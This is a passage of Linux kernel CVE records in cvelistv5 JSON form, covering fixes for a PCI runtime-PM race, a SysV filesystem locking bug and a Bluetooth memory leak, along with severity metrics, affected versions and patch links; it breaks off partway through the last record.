"url": "https://git.kernel.org/stable/c/ae99e199037c580b7350bfa3596f447a53bcf01f"
},
{
"url": "https://git.kernel.org/stable/c/ca2cf98d46748373e830a13d85d215d64a2d9bf2"
},
{
"url": "https://git.kernel.org/stable/c/e2c02a85bf53ae86d79b5fccf0a75ac0b78e0c96"
}
],
"title": "clk: qcom: mmcc-msm8974: fix terminating of frequency table arrays",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26965",
"datePublished": "2024-05-01T05:19:32.635Z",
"dateReserved": "2024-02-19T14:20:24.201Z",
"dateUpdated": "2025-05-04T09:00:58.832Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35809 (GCVE-0-2024-35809)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 09:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
PCI/PM: Drain runtime-idle callbacks before driver removal
A race condition between the .runtime_idle() callback and the .remove()
callback in the rtsx_pcr PCI driver leads to a kernel crash due to an
unhandled page fault [1].
The problem is that rtsx_pci_runtime_idle() is not expected to be running
after pm_runtime_get_sync() has been called, but the latter doesn't really
guarantee that. It only guarantees that the suspend and resume callbacks
will not be running when it returns.
However, if a .runtime_idle() callback is already running when
pm_runtime_get_sync() is called, the latter will notice that the runtime PM
status of the device is RPM_ACTIVE and it will return right away without
waiting for the former to complete. In fact, it cannot wait for
.runtime_idle() to complete because it may be called from that callback (it
arguably does not make much sense to do that, but it is not strictly
prohibited).
Thus in general, whoever is providing a .runtime_idle() callback needs
to protect it from running in parallel with whatever code runs after
pm_runtime_get_sync(). [Note that .runtime_idle() will not start after
pm_runtime_get_sync() has returned, but it may continue running then if it
has started earlier.]
One way to address that race condition is to call pm_runtime_barrier()
after pm_runtime_get_sync() (not before it, because a nonzero value of the
runtime PM usage counter is necessary to prevent runtime PM callbacks from
being invoked) to wait for the .runtime_idle() callback to complete should
it be running at that point. A suitable place for doing that is in
pci_device_remove() which calls pm_runtime_get_sync() before removing the
driver, so it may as well call pm_runtime_barrier() subsequently, which
will prevent the race in question from occurring, not just in the rtsx_pcr
driver, but in any PCI drivers providing .runtime_idle() callbacks.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35809",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-31T18:40:16.396244Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-29T19:25:02.357Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.494Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a87375bb586515c0af63d5dcdcd58ec4acf20a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/47d8aafcfe313511a98f165a54d0adceb34e54b1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bbe068b24409ef740657215605284fc7cdddd491"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7cc94dd36e48879e76ae7a8daea4ff322b7d9674"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/900b81caf00c89417172afe0e7e49ac4eb110f4b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d86ad8c3e152349454b82f37007ff6ba45f26989"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d534198311c345e4b062c4b88bb609efb8bd91d5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6347348c6aba52dda0b33296684cbb627bdc6970"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d5286d4e7f68beab450deddbb6a32edd5ecf4bf"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/pci/pci-driver.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9a87375bb586515c0af63d5dcdcd58ec4acf20a6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "47d8aafcfe313511a98f165a54d0adceb34e54b1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bbe068b24409ef740657215605284fc7cdddd491",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7cc94dd36e48879e76ae7a8daea4ff322b7d9674",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "900b81caf00c89417172afe0e7e49ac4eb110f4b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d86ad8c3e152349454b82f37007ff6ba45f26989",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d534198311c345e4b062c4b88bb609efb8bd91d5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6347348c6aba52dda0b33296684cbb627bdc6970",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9d5286d4e7f68beab450deddbb6a32edd5ecf4bf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/pci/pci-driver.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI/PM: Drain runtime-idle callbacks before driver removal\n\nA race condition between the .runtime_idle() callback and the .remove()\ncallback in the rtsx_pcr PCI driver leads to a kernel crash due to an\nunhandled page fault [1].\n\nThe problem is that rtsx_pci_runtime_idle() is not expected to be running\nafter pm_runtime_get_sync() has been called, but the latter doesn\u0027t really\nguarantee that. It only guarantees that the suspend and resume callbacks\nwill not be running when it returns.\n\nHowever, if a .runtime_idle() callback is already running when\npm_runtime_get_sync() is called, the latter will notice that the runtime PM\nstatus of the device is RPM_ACTIVE and it will return right away without\nwaiting for the former to complete. In fact, it cannot wait for\n.runtime_idle() to complete because it may be called from that callback (it\narguably does not make much sense to do that, but it is not strictly\nprohibited).\n\nThus in general, whoever is providing a .runtime_idle() callback needs\nto protect it from running in parallel with whatever code runs after\npm_runtime_get_sync(). [Note that .runtime_idle() will not start after\npm_runtime_get_sync() has returned, but it may continue running then if it\nhas started earlier.]\n\nOne way to address that race condition is to call pm_runtime_barrier()\nafter pm_runtime_get_sync() (not before it, because a nonzero value of the\nruntime PM usage counter is necessary to prevent runtime PM callbacks from\nbeing invoked) to wait for the .runtime_idle() callback to complete should\nit be running at that point. A suitable place for doing that is in\npci_device_remove() which calls pm_runtime_get_sync() before removing the\ndriver, so it may as well call pm_runtime_barrier() subsequently, which\nwill prevent the race in question from occurring, not just in the rtsx_pcr\ndriver, but in any PCI drivers providing .runtime_idle() callbacks."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:53.318Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9a87375bb586515c0af63d5dcdcd58ec4acf20a6"
},
{
"url": "https://git.kernel.org/stable/c/47d8aafcfe313511a98f165a54d0adceb34e54b1"
},
{
"url": "https://git.kernel.org/stable/c/bbe068b24409ef740657215605284fc7cdddd491"
},
{
"url": "https://git.kernel.org/stable/c/7cc94dd36e48879e76ae7a8daea4ff322b7d9674"
},
{
"url": "https://git.kernel.org/stable/c/900b81caf00c89417172afe0e7e49ac4eb110f4b"
},
{
"url": "https://git.kernel.org/stable/c/d86ad8c3e152349454b82f37007ff6ba45f26989"
},
{
"url": "https://git.kernel.org/stable/c/d534198311c345e4b062c4b88bb609efb8bd91d5"
},
{
"url": "https://git.kernel.org/stable/c/6347348c6aba52dda0b33296684cbb627bdc6970"
},
{
"url": "https://git.kernel.org/stable/c/9d5286d4e7f68beab450deddbb6a32edd5ecf4bf"
}
],
"title": "PCI/PM: Drain runtime-idle callbacks before driver removal",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35809",
"datePublished": "2024-05-17T13:23:16.168Z",
"dateReserved": "2024-05-17T12:19:12.342Z",
"dateUpdated": "2025-05-04T09:05:53.318Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52699 (GCVE-0-2023-52699)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
sysv: don't call sb_bread() with pointers_lock held
syzbot is reporting sleep in atomic context in SysV filesystem [1], for
sb_bread() is called with rw_spinlock held.
A "write_lock(&pointers_lock) => read_lock(&pointers_lock) deadlock" bug
and a "sb_bread() with write_lock(&pointers_lock)" bug were introduced by
"Replace BKL for chain locking with sysvfs-private rwlock" in Linux 2.5.12.
Then, "[PATCH] err1-40: sysvfs locking fix" in Linux 2.6.8 fixed the
former bug by moving pointers_lock lock to the callers, but instead
introduced a "sb_bread() with read_lock(&pointers_lock)" bug (which made
this problem easier to hit).
Al Viro suggested that why not to do like get_branch()/get_block()/
find_shared() in Minix filesystem does. And doing like that is almost a
revert of "[PATCH] err1-40: sysvfs locking fix" except that get_branch()
from with find_shared() is called without write_lock(&pointers_lock).
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52699",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-21T15:05:59.108260Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T17:06:03.220Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:35.577Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13b33feb2ebddc2b1aa607f553566b18a4af1d76"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b4fe801b5bedec2b622ddb18e5c9bf26c63d79f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/674c1c4229e743070e09db63a23442950ff000d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fd203d2c671bdee9ab77090ff394d3b71b627927"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/53cb1e52c9db618c08335984d1ca80db220ccf09"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89e8524135a3902e7563a5a59b7b5ec1bf4904ac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a69224223746ab96d43e5db9d22d136827b7e2d3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f123dc86388cb669c3d6322702dc441abc35c31e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/sysv/itree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "13b33feb2ebddc2b1aa607f553566b18a4af1d76",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1b4fe801b5bedec2b622ddb18e5c9bf26c63d79f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "674c1c4229e743070e09db63a23442950ff000d1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fd203d2c671bdee9ab77090ff394d3b71b627927",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "53cb1e52c9db618c08335984d1ca80db220ccf09",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "89e8524135a3902e7563a5a59b7b5ec1bf4904ac",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a69224223746ab96d43e5db9d22d136827b7e2d3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f123dc86388cb669c3d6322702dc441abc35c31e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/sysv/itree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysv: don\u0027t call sb_bread() with pointers_lock held\n\nsyzbot is reporting sleep in atomic context in SysV filesystem [1], for\nsb_bread() is called with rw_spinlock held.\n\nA \"write_lock(\u0026pointers_lock) =\u003e read_lock(\u0026pointers_lock) deadlock\" bug\nand a \"sb_bread() with write_lock(\u0026pointers_lock)\" bug were introduced by\n\"Replace BKL for chain locking with sysvfs-private rwlock\" in Linux 2.5.12.\n\nThen, \"[PATCH] err1-40: sysvfs locking fix\" in Linux 2.6.8 fixed the\nformer bug by moving pointers_lock lock to the callers, but instead\nintroduced a \"sb_bread() with read_lock(\u0026pointers_lock)\" bug (which made\nthis problem easier to hit).\n\nAl Viro suggested that why not to do like get_branch()/get_block()/\nfind_shared() in Minix filesystem does. And doing like that is almost a\nrevert of \"[PATCH] err1-40: sysvfs locking fix\" except that get_branch()\n from with find_shared() is called without write_lock(\u0026pointers_lock)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:52.866Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/13b33feb2ebddc2b1aa607f553566b18a4af1d76"
},
{
"url": "https://git.kernel.org/stable/c/1b4fe801b5bedec2b622ddb18e5c9bf26c63d79f"
},
{
"url": "https://git.kernel.org/stable/c/674c1c4229e743070e09db63a23442950ff000d1"
},
{
"url": "https://git.kernel.org/stable/c/fd203d2c671bdee9ab77090ff394d3b71b627927"
},
{
"url": "https://git.kernel.org/stable/c/53cb1e52c9db618c08335984d1ca80db220ccf09"
},
{
"url": "https://git.kernel.org/stable/c/89e8524135a3902e7563a5a59b7b5ec1bf4904ac"
},
{
"url": "https://git.kernel.org/stable/c/a69224223746ab96d43e5db9d22d136827b7e2d3"
},
{
"url": "https://git.kernel.org/stable/c/f123dc86388cb669c3d6322702dc441abc35c31e"
}
],
"title": "sysv: don\u0027t call sb_bread() with pointers_lock held",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52699",
"datePublished": "2024-05-19T10:10:30.381Z",
"dateReserved": "2024-03-07T14:49:46.890Z",
"dateUpdated": "2025-05-04T07:41:52.866Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35978 (GCVE-0-2024-35978)
Vulnerability from cvelistv5
Published
2024-05-20 09:42
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: Fix memory leak in hci_req_sync_complete()
In 'hci_req_sync_complete()', always free the previous sync
request state before assigning reference to a new one.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 Version: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 Version: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 Version: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 Version: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 Version: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 Version: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 Version: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.106Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89a32741f4217856066c198a4a7267bcdd1edd67"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4beab84fbb50df3be1d8f8a976e6fe882ca65cb2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8478394f76c748862ef179a16f651f752bdafaf0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/75193678cce993aa959e7764b6df2f599886dd06"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/66fab1e120b39f8f47a94186ddee36006fc02ca8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9ab5e44b9bac946bd49fd63264a08cd1ea494e76"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e4cb8382fff6706436b66eafd9c0ee857ff0a9f5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35978",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:40:19.764232Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:13.184Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bluetooth/hci_request.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "89a32741f4217856066c198a4a7267bcdd1edd67",
"status": "affected",
"version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
"versionType": "git"
},
{
"lessThan": "4beab84fbb50df3be1d8f8a976e6fe882ca65cb2",
"status": "affected",
"version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
"versionType": "git"
},
{
"lessThan": "8478394f76c748862ef179a16f651f752bdafaf0",
"status": "affected",
"version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
"versionType": "git"
},
{
"lessThan": "75193678cce993aa959e7764b6df2f599886dd06",
"status": "affected",
"version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
"versionType": "git"
},
{
"lessThan": "66fab1e120b39f8f47a94186ddee36006fc02ca8",
"status": "affected",
"version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
"versionType": "git"
},
{
"lessThan": "9ab5e44b9bac946bd49fd63264a08cd1ea494e76",
"status": "affected",
"version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
"versionType": "git"
},
{
"lessThan": "e4cb8382fff6706436b66eafd9c0ee857ff0a9f5",
"status": "affected",
"version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
"versionType": "git"
},
{
"lessThan": "45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810",
"status": "affected",
"version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bluetooth/hci_request.c"
],
